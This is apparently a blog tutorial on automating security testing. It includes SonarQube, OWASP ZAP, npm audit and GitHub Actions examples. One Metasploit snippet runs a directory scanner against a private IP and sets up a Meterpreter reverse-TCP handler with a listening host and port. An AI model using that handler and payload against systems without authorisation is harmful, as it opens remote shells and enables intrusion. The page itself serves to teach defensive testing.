Sign in Subscribe
By AI TDD in security-testing

Security Testing Automation: SAST, DAST, and Penetration Testing

Security Testing Fundamentals

Security testing is essential for protecting applications from vulnerabilities and attacks. Automated security testing helps identify security issues early in the development lifecycle.

Types of Security Testing

  • SAST (Static Application Security Testing): Analyze source code for vulnerabilities
  • DAST (Dynamic Application Security Testing): Test running applications for security issues
  • IAST (Interactive Application Security Testing): Runtime security testing with code instrumentation
  • SCA (Software Composition Analysis): Identify vulnerabilities in dependencies
  • Penetration Testing: Simulate real-world attacks

SAST with SonarQube

// SonarQube Configuration Example
sonar.projectKey=my-application
sonar.projectName=My Application
sonar.projectVersion=1.0
sonar.sources=src
sonar.tests=test
sonar.java.binaries=target/classes
sonar.java.test.binaries=target/test-classes
sonar.coverage.jacoco.xmlReportPaths=target/site/jacoco/jacoco.xml

# Security rules
sonar.security.sources.javasecurity=src
sonar.security.sources.pythonsecurity=src
sonar.security.sources.javascriptsecurity=src

OWASP ZAP for DAST

// OWASP ZAP Automation Example
const ZapClient = require('zaproxy');

async function runZapScan() {
    const zaproxy = new ZapClient({
        apiKey: 'your-api-key',
        proxy: 'http://localhost:8080'
    });
    
    // Start spider scan
    const spiderScanId = await zaproxy.spider.scan({
        url: 'https://example.com',
        maxChildren: 10
    });
    
    // Wait for spider to complete
    await zaproxy.spider.scanStatus(spiderScanId);
    
    // Start active scan
    const activeScanId = await zaproxy.ascan.scan({
        url: 'https://example.com',
        recurse: true
    });
    
    // Wait for active scan to complete
    await zaproxy.ascan.scanStatus(activeScanId);
    
    // Get scan results
    const alerts = await zaproxy.core.alerts();
    console.log('Security Alerts:', alerts);
}

Dependency Vulnerability Scanning

// npm audit automation
const { exec } = require('child_process');

function runNpmAudit() {
    return new Promise((resolve, reject) => {
        exec('npm audit --json', (error, stdout, stderr) => {
            if (error) {
                reject(error);
                return;
            }
            
            const auditResults = JSON.parse(stdout);
            
            // Check for high and critical vulnerabilities
            const criticalVulns = auditResults.vulnerabilities.filter(
                vuln => vuln.severity === 'critical'
            );
            
            const highVulns = auditResults.vulnerabilities.filter(
                vuln => vuln.severity === 'high'
            );
            
            if (criticalVulns.length > 0 || highVulns.length > 0) {
                console.error('Security vulnerabilities found!');
                console.error('Critical:', criticalVulns.length);
                console.error('High:', highVulns.length);
                reject(new Error('Security vulnerabilities detected'));
            } else {
                console.log('No critical or high vulnerabilities found');
                resolve(auditResults);
            }
        });
    });
}

Penetration Testing with Metasploit

# Metasploit Framework Example
# This is for educational purposes only
use auxiliary/scanner/http/dir_scanner
set RHOSTS 192.168.1.100
set THREADS 10
run

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.10
set LPORT 4444
exploit

Security Testing in CI/CD

# GitHub Actions Security Workflow
name: Security Testing

on: [push, pull_request]

jobs:
  security-scan:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v2
      
      - name: Run SAST with CodeQL
        uses: github/codeql-action/init@v2
        with:
          languages: javascript, python
      
      - name: Perform CodeQL Analysis
        uses: github/codeql-action/analyze@v2
      
      - name: Run npm audit
        run: npm audit --audit-level=high
      
      - name: Run OWASP ZAP
        uses: zaproxy/action-full-scan@v0.4.0
        with:
          target: 'https://example.com'

Common Security Vulnerabilities to Test

  • SQL Injection: Test input validation and parameterized queries
  • Cross-Site Scripting (XSS): Validate output encoding
  • Cross-Site Request Forgery (CSRF): Test token validation
  • Authentication Bypass: Test login mechanisms
  • Authorization Issues: Test access control
  • Sensitive Data Exposure: Check for data leaks

Security Testing Best Practices

  • Integrate security testing into CI/CD pipeline
  • Use multiple security testing tools
  • Regularly update security testing tools
  • Train developers on secure coding practices
  • Implement security monitoring and alerting
  • Conduct regular security assessments
  • SonarQube: Code quality and security analysis
  • OWASP ZAP: Web application security scanner
  • Burp Suite: Web application security testing
  • Snyk: Dependency vulnerability scanning
  • Bandit: Python security linter
  • ESLint Security: JavaScript security rules
  • "The Web Application Hacker's Handbook" by Dafydd Stuttard
  • "OWASP Testing Guide" by OWASP Foundation
  • "Security Engineering" by Ross Anderson

Subscribe to AI.TDD - The New Paradigm of Software Development

Don’t miss out on the latest issues. Sign up now to get access to the library of members-only issues.
jamie@example.com
Subscribe